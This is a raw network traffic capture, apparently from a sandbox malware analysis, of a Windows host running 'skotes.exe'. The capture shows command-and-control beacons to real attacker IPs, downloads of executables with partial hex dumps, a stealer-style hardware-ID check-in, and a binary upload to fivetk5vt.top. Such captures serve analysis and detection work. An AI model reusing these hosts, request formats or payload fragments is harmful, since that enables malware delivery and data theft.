Dec 19, 2024 10:11:42.426580906 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.6	50131	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:43.025324106 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:11:44.111134052 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76379 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:11:46.555893898 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:11:46.870157003 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76382 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:11:56.943782091 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 19, 2024 10:11:58.079386950 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:11:58.394707918 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76394 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:12:02.417354107 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:12:02.732197046 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76398 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:12:09.311722040 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:12:09.626424074 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76405 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:12:10.735162020 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:12:11.049565077 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76406 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:12:19.657156944 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:12:19.971746922 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76415 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:12:30.048315048 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 19, 2024 10:12:39.470276117 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:12:39.785418987 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76435 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.6	50132	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:45.024591923 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 19, 2024 10:11:46.372632027 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 19, 2024 10:11:46.377101898 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDAFIEBFCBKFHIDHIJE Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 35 46 35 46 37 36 31 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 2d 2d 0d 0a Data Ascii: ------FIDAFIEBFCBKFHIDHIJEContent-Disposition: form-data; name="hwid"F255F5F7614C2817018708------FIDAFIEBFCBKFHIDHIJEContent-Disposition: form-data; name="build"stok------FIDAFIEBFCBKFHIDHIJE--
Dec 19, 2024 10:11:46.824878931 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	50133	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:45.062683105 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 38 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017486001&unit=246122658369
Dec 19, 2024 10:11:46.414472103 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	50135	31.41.244.11	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:46.544536114 CET	59	OUT	GET /files/dodo/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 19, 2024 10:11:47.963115931 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:47 GMT Content-Type: application/octet-stream Content-Length: 765568 Last-Modified: Tue, 17 Dec 2024 09:46:16 GMT Connection: keep-alive ETag: "67614868-bae80" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bss`@
Dec 19, 2024 10:11:47.964391947 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:47.964407921 CET	448	IN	Data Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24 Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"\|$$D$(WVt$VfSCErPPD$\|$$l$(WVPe\$Dl$t$h5Vm
Dec 19, 2024 10:11:47.964421034 CET	1236	IN	Data Raw: 00 02 00 00 31 c9 88 8c 0c 00 01 00 00 89 c8 99 f7 fe 8a 04 17 88 04 0c 41 81 f9 00 01 00 00 75 e5 31 c0 31 c9 8a 94 04 00 01 00 00 00 d1 02 0c 04 0f b6 f1 8a b4 34 00 01 00 00 88 b4 04 00 01 00 00 88 94 34 00 01 00 00 40 3d 00 01 00 00 75 d4 83 Data Ascii: 1Au1144@=u$1111QQQ(9BCIuhMBheB~P:C$09G9$
Dec 19, 2024 10:11:47.965724945 CET	1236	IN	Data Raw: c4 0c 01 e7 83 c7 10 eb 4b 89 f9 83 c9 0f 83 f9 17 be 16 00 00 00 0f 43 f1 8d 46 01 81 f9 ff 0f 00 00 72 08 50 e8 0f 01 00 00 eb 06 50 e8 ef 11 00 00 83 c4 04 89 c3 89 44 24 10 89 7c 24 20 89 74 24 24 57 55 50 e8 c4 5f 00 00 83 c4 0c 01 df 8d 5c Data Ascii: KCFrPPD$\|$ t$$WUP_\$h5SmD$$r1L$prQ) $VQTWuED$D$E$(L$I!UW49BD$$4$t$
Dec 19, 2024 10:11:47.965749979 CET	448	IN	Data Raw: 51 e8 8c 44 00 00 83 c4 08 c7 06 88 c3 41 00 f2 0f 10 47 0c f2 0f 11 46 0c 89 f0 5e 5f c2 04 00 cc 56 89 ce 8b 44 24 08 c7 01 28 c1 41 00 83 c1 04 31 d2 89 56 08 89 56 04 83 c0 04 51 50 e8 4f 44 00 00 83 c4 08 c7 06 a8 c3 41 00 89 f0 5e c2 04 00 Data Ascii: QDAGF^_VD$(A1VVQPODA^xdBdBd,;`VBhxdBP=xdBuh@hxdB\|V\|$tV^BUSWVPt$D$uJWFFj \
Dec 19, 2024 10:11:47.965763092 CET	1236	IN	Data Raw: c2 08 00 e8 93 fa ff ff cc 8b 44 24 04 8b 54 24 08 89 10 89 48 04 c2 08 00 8b 44 24 04 8b 10 8b 40 04 8b 49 04 33 48 04 33 54 24 08 09 ca 0f 94 c0 c2 08 00 cc 53 57 56 83 ec 0c 8b 74 24 20 8b 44 24 1c 8b 15 c0 57 42 00 31 e2 89 54 24 08 8b 11 89 Data Ascii: D$T$HD$@I3H3T$SWVt$ D$WB1T$PWROVI3J3L$1^_[USWVWB1D$WD$W$t$8l$4\$0wx@Wt$<PXQ
Dec 19, 2024 10:11:47.967041969 CET	1236	IN	Data Raw: 01 fb 8b 74 24 20 56 ff 74 24 20 53 e8 96 54 00 00 83 c4 0c c6 04 1e 00 89 7d 00 89 e8 83 c4 08 5e 5f 5b 5d c2 08 00 89 f8 83 c8 0f 01 d1 39 c8 89 ce 0f 47 f0 89 f0 40 75 0a 31 c0 31 f6 4e e9 13 ff ff ff 3d 00 10 00 00 0f 83 fb fe ff ff 50 e8 64 Data Ascii: t$ Vt$ ST}^_[]9G@u11N=PdhkV@\|u.Dt%L8P4u@DjP}^WVWB1D$V&t!@L8D$Pf1HT
Dec 19, 2024 10:11:47.967058897 CET	448	IN	Data Raw: 57 56 8b 5c 24 14 8b 74 24 10 39 de 74 1b 89 cf 83 c7 08 0f b6 06 57 50 e8 f6 21 00 00 83 c4 08 88 06 46 39 de 75 ec 89 de 89 f0 5e 5f 5b c2 08 00 0f b6 44 24 04 83 c1 08 51 50 e8 d3 21 00 00 83 c4 08 c2 04 00 cc 56 8b 44 24 08 8b 74 24 0c 89 f1 Data Ascii: WV\$t$9tWP!F9u^_[D$QP!VD$t$)QPt$tO^D$VD$t$)QPt$JO^D$Vy~vxv^FtPVD$(A1VVQP78
Dec 19, 2024 10:11:47.968341112 CET	1236	IN	Data Raw: 1c 00 00 b9 cc 69 42 00 e8 ef 03 00 00 68 88 b8 41 00 e8 45 01 00 00 59 c3 68 92 b8 41 00 e8 39 01 00 00 59 c3 55 8b ec eb 0d ff 75 08 e8 a9 65 00 00 59 85 c0 74 0f ff 75 08 e8 28 a0 00 00 59 85 c0 74 e6 5d c3 83 7d 08 ff 0f 84 f2 20 00 00 e9 31 Data Ascii: iBhAEYhA9YUueYtu(Yt]} 1UuY]UEV AtjVYY^]U];WBu!UVWdBW09Bu>u&}>td,dBWBW0:B_
Dec 19, 2024 10:11:48.101026058 CET	1236	IN	Data Raw: ec 56 6a 00 6a 00 e8 93 9b 00 00 8b 75 08 85 c0 59 59 b9 53 03 42 00 0f 45 c8 51 8d 4e 24 e8 41 00 00 00 8b 45 0c 85 c0 74 0a 50 6a 00 e8 6c 9b 00 00 59 59 85 c0 b9 88 0e 42 00 0f 45 c8 51 8d 4e 2c e8 1d 00 00 00 5e 5d c3 55 8b ec 8b 45 08 83 78 Data Ascii: VjjuYYSBEQN$AEtPjlYYBEQN,^]UEx$tp$j>YY]USW}9;t>;t3Y#t*?VtF>u+FVYtVWPH^_[]VV(A?~YtvKYfA^UQj cEY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	50138	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:51.777477026 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017487001&unit=246122658369
Dec 19, 2024 10:11:53.121731043 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	50141	31.41.244.11	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:53.246247053 CET	59	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 19, 2024 10:11:54.568182945 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:54 GMT Content-Type: application/octet-stream Content-Length: 776832 Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT Connection: keep-alive ETag: "6761482a-bda80" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bssp@
Dec 19, 2024 10:11:54.568468094 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:54.568686008 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:54.569052935 CET	1236	IN	Data Raw: 8b 6c 24 0c 8d 74 24 14 c6 07 00 68 35 02 00 00 56 e8 6d fe ff ff 83 c4 08 89 c7 3b 44 24 48 75 1a 8b 44 1d 24 8b 4c 24 04 0f b7 04 01 8b 4c 1d 1c 01 d9 8b 04 81 89 04 24 eb 05 83 44 24 08 04 8b 44 24 28 83 f8 10 72 2d 8b 4c 24 14 8d 70 01 81 fe Data Ascii: l$t$h5Vm;D$HuD$L$L$D$D$(r-L$prQ) sT$VQl$;\|$HtD$$4$L$,10^_[]*-USWV$$$ WB1$1
Dec 19, 2024 10:11:54.569063902 CET	1236	IN	Data Raw: ff ff 83 ec 14 0f 28 05 10 c0 41 00 0f 11 44 24 04 89 1c 24 c7 44 24 18 00 00 00 00 c7 44 24 14 80 00 00 00 ff d0 83 f8 ff 0f 84 ab 01 00 00 89 c7 6a 00 50 ff 15 98 39 42 00 83 f8 ff 0f 84 70 01 00 00 89 c3 50 e8 1c 13 00 00 83 c4 04 89 c5 8d 44 Data Ascii: (AD$$D$D$jP9BpPD$jPSUW,:BBW49BE<L=l$$D$\$L$WD$ WD$Uv+w\|$ D$$WUS`K
Dec 19, 2024 10:11:54.570384979 CET	1236	IN	Data Raw: 08 89 f1 52 57 e8 0b 00 00 00 68 f8 41 42 00 56 e8 80 3f 00 00 56 89 ce 8b 44 24 0c ff 74 24 08 ff 70 04 ff 30 e8 f9 02 00 00 c7 06 10 c2 41 00 89 f0 5e c2 08 00 cc 57 56 89 ce 8b 7c 24 0c c7 01 28 c1 41 00 8d 41 04 31 c9 89 4e 08 89 4e 04 8d 4f Data Ascii: RWhABV?VD$t$p0A^WV\|$(AA1NNOPQEAGONFA^_WV\|$(AA1NNOPQDAGONF\A^_WV\|$(AA1NNOPQDAG
Dec 19, 2024 10:11:54.570396900 CET	1236	IN	Data Raw: 89 43 0c 89 7b 1c 8b 4d cc 89 4b 20 47 57 ff 75 c8 50 e8 30 57 00 00 83 c4 0c 8b 45 08 89 43 04 8b 45 0c 89 43 08 8d 7d d8 89 3b e8 9f 00 00 00 83 c4 24 8b 65 c4 83 7f 14 10 72 03 8b 7d d8 c7 06 28 c1 41 00 8d 46 04 31 c9 89 4e 08 89 4e 04 8d 4d Data Ascii: C{MK GWuP0WECEC};$er}(AF1NNM9APQ>@AEr,MxrQ) s>$WQAEFEFM1e^_[]USWV\|$0WB1D$t$<~t
Dec 19, 2024 10:11:54.571068048 CET	1120	IN	Data Raw: e0 89 44 24 04 8b 39 85 ff 75 26 89 ce 89 e1 6a 00 e8 f6 07 00 00 83 3e 00 75 0d a1 80 65 42 00 40 a3 80 65 42 00 89 06 89 e1 e8 0e 08 00 00 8b 3e 8b 4c 24 04 31 e1 e8 bd 04 00 00 89 f8 83 c4 08 5e 5f c3 cc 57 56 8b 7c 24 0c 8b 41 04 39 78 0c 76 Data Ascii: D$9u&j>ueB@eB>L$1^_WV\|$A9xvH4u1xtf9xv@4^_SWV8\$HWB1D$4t\;uW\|$LjGtHESBP_FAPb#3
Dec 19, 2024 10:11:54.571078062 CET	1236	IN	Data Raw: 1c 00 00 b9 cc 69 42 00 e8 ef 03 00 00 68 88 b8 41 00 e8 45 01 00 00 59 c3 68 92 b8 41 00 e8 39 01 00 00 59 c3 55 8b ec eb 0d ff 75 08 e8 a9 65 00 00 59 85 c0 74 0f ff 75 08 e8 28 a0 00 00 59 85 c0 74 e6 5d c3 83 7d 08 ff 0f 84 f2 20 00 00 e9 31 Data Ascii: iBhAEYhA9YUueYtu(Yt]} 1UuY]UEV AtjVYY^]U];WBu!UVWdBW09Bu>u&}>td,dBWBW0:B_
Dec 19, 2024 10:11:54.571088076 CET	224	IN	Data Raw: ec 56 6a 00 6a 00 e8 93 9b 00 00 8b 75 08 85 c0 59 59 b9 53 03 42 00 0f 45 c8 51 8d 4e 24 e8 41 00 00 00 8b 45 0c 85 c0 74 0a 50 6a 00 e8 6c 9b 00 00 59 59 85 c0 b9 88 0e 42 00 0f 45 c8 51 8d 4e 2c e8 1d 00 00 00 5e 5d c3 55 8b ec 8b 45 08 83 78 Data Ascii: VjjuYYSBEQN$AEtPjlYYBEQN,^]UEx$tp$j>YY]USW}9;t>;t3Y#t*?VtF>u+FVYtVWPH^_[]VV(A?~YtvKYfA
Dec 19, 2024 10:11:54.687813997 CET	1236	IN	Data Raw: 00 5e c3 55 8b ec 51 6a 20 e8 63 fa ff ff 89 45 fc 59 85 c0 74 0c ff 75 08 8b c8 e8 77 00 00 00 c9 c3 33 c0 c9 c3 55 8b ec 51 51 53 57 6a 00 8d 4d f8 e8 c1 fd ff ff 8b 45 08 8b 78 0c 8d 58 08 85 ff 74 3f 56 8b 03 4f 8b 04 b8 89 45 fc 85 c0 74 2c Data Ascii: ^UQj cEYtuw3UQQSWjMExXt?VOEt,p7BMEtj17BMu^3YM_[UQE3VhBuNF(AVVVFQ^UVEtj VYY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	50145	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:58.508173943 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 38 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017488001&unit=246122658369
Dec 19, 2024 10:11:59.844189882 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.6	50146	176.53.146.212	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:59.398545027 CET	641	OUT	POST /v1/upload.php HTTP/1.1 Host: fivetk5vt.top Accept: / Content-Length: 462 Content-Type: multipart/form-data; boundary=------------------------8ORzNntBtFTcs2Ev6GtoTy Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 4f 52 7a 4e 6e 74 42 74 46 54 63 73 32 45 76 36 47 74 6f 54 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 75 77 65 6d 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff ff 89 8d f8 02 12 1f 07 67 ef 8b fc 8f 4e f9 b5 23 6a fe b4 47 c3 b1 eb f2 06 ce 32 d2 c5 53 d9 5b 5d a5 24 a0 f3 e1 20 ce 1f 11 3b 02 72 d9 10 3d eb 0a b6 79 19 e7 7e 